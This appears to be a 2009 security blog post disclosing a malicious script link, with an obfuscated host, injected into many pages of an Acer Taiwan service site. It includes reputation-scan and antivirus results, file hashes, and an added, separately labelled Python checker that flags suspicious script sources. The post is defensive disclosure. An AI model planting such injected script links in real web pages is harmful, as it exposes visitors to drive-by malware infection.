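Malicious link injected into the 宏碁微巨電子化服務 (Acer) website
February 2, 2009 – 10:54:49
A malicious link has been injected into the 宏碁微巨電子化服務 (Acer) website. The injected link was found on January 30, 2009, and many pages still contain it at the time of writing. Anyone who has visited this site recently should check their computer for infection as soon as possible.
The pages of the 宏碁微巨電子化服務 website that carry the injected malicious link are shown below:
The malicious link/code is placed in the pages at the URL above (many pages carry it, so the database may have a vulnerability):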
3bomb.%63om/c.js
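A defender-side check for the injection described above, as an added example that is not part of the original post: it scans a page's `<script>` tags and flags any source whose host is percent-encoded (as in `3bomb.%63om`) or is not on an allow-list. The sample page, the `<script>` tag form around the URL and the `example.com.tw` allow-list are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Hosts the site is expected to load scripts from (assumed allow-list).
ALLOWED_HOSTS = {"static.example.com.tw"}

# Constructed sample page: two legitimate scripts plus one injected into table data.
SAMPLE_PAGE = """
<html><head>
<script src="/js/menu.js"></script>
<script src="http://static.example.com.tw/lib.js"></script>
</head><body>
<td>Product name<script src=http://3bomb.%63om/c.js></script></td>
</body></html>
"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.sources.append(src.strip())


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return external script sources that are obfuscated or not allow-listed."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        # Protocol-relative URLs need a scheme before urlsplit sees a host.
        url = "http:" + src if src.startswith("//") else src
        raw_host = urlsplit(url).hostname  # lower-cased, NOT percent-decoded
        if raw_host is None:  # relative path: same-origin script
            continue
        host = unquote(raw_host)
        obfuscated = host != raw_host  # percent-encoding in a hostname is a red flag
        if obfuscated or host not in allowed_hosts:
            findings.append({"src": src, "host": host, "obfuscated": obfuscated})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_PAGE):
        print(finding)
```

Run it over rendered pages as well as over text columns exported from the database, since the post suspects the tag is stored in the data rather than in the templates.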
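The results of the web reputation scans are shown below:
Google Search result (anomaly found), as shown in the figure below:
Armorize (阿碼科技) HackAlert (malicious behavior detection) result (anomaly found), as shown in the figure below:
McAfee SiteAdvisor result (no anomaly found), as shown in the figure below:
Trend Micro web reputation result (anomaly found), as shown in the figure below:
Symantec Safe Web result (anomaly found), as shown in the figure below:
The VirusTotal scan result follows (for reference only):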
File a1.css-pe received on 01.31.2009 18:55:08 (CET)
Result: 32/38 (84.21%)
Antivirus Version Last Update Result
a-squared – – Trojan-Dropper.Agent!IK
AhnLab-V3 – – Dropper/Downloader.39061
AntiVir – – TR/Dropper.Gen
Authentium – – W32/OnlineGames.AJ.gen!Eldorado
Avast – – Win32:Rootkit-gen
AVG – – Agent_r.IL.dropper
BitDefender – – Rootkit.Agent.AIWN
CAT-QuickHeal – – (Suspicious) – DNAScan
ClamAV – – -
Comodo – – -
DrWeb – – MULDROP.Trojan
eSafe – – Suspicious File
eTrust-Vet – – Win32/SillyDl!generic
F-Prot – – W32/OnlineGames.AJ.gen!Eldorado
F-Secure – – Trojan-Dropper.Win32.Agent.afyw
Fortinet – – suspicious
GData – – Rootkit.Agent.AIWN
Ikarus – – Trojan-Dropper.Agent
K7AntiVirus – – -
Kaspersky – – Trojan-Dropper.Win32.Agent.afyw
McAfee – – Generic Dropper
McAfee+Artemis – – Generic Dropper
Microsoft – – TrojanDownloader:Win32/Small.gen!K
NOD32 – – Win32/TrojanDownloader.Agent.OQW
Norman – – Suspicious_F.gen
nProtect – – -
Panda – – Suspicious file
PCTools – – Packed/FSG
Prevx1 – – -
Rising – – -
SecureWeb-Gateway – – Trojan.Dropper.Gen
Sophos – – Mal/Behav-024
Sunbelt – – Trojan.Win32.Packed.gen (v)
TheHacker – – Trojan/Dropper.Agent.afyw
TrendMicro – – TROJ_DROPPER.HII
VBA32 – – suspected of Win32.Trojan.Downloader (http://…)
ViRobot – – Dropper.Agent.39305
VirusBuster – – Packed/FSG
Additional information
MD5: 389aaf2a396c412e18af2fa3e946a35c
SHA1: f664718c46f7799a590143eb9097559e8df73a79
SHA256: 6d0840c7413b23c4277e0619a69901ce419c3225bfaf23fe1f706fd8bd2d7c9e
SHA512: 7869724d21d55c485d232e37c56a29cca3f1b42561e61dfac91c279836bbb34e98cd479f5a187741dbbff721028d8b3dd884ddfa679a5cef3a1df79fdcbd6bf4

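“Malicious link injected into the 宏碁微巨電子化服務 (Acer) website” currently has 2 comments
For the second image, the large image you get when clicking through does not match.
Was the wrong file uploaded?
By guest on February 2, 2009 - 17:15:42
Fixed.
By Roger on February 2, 2009 - 17:40:12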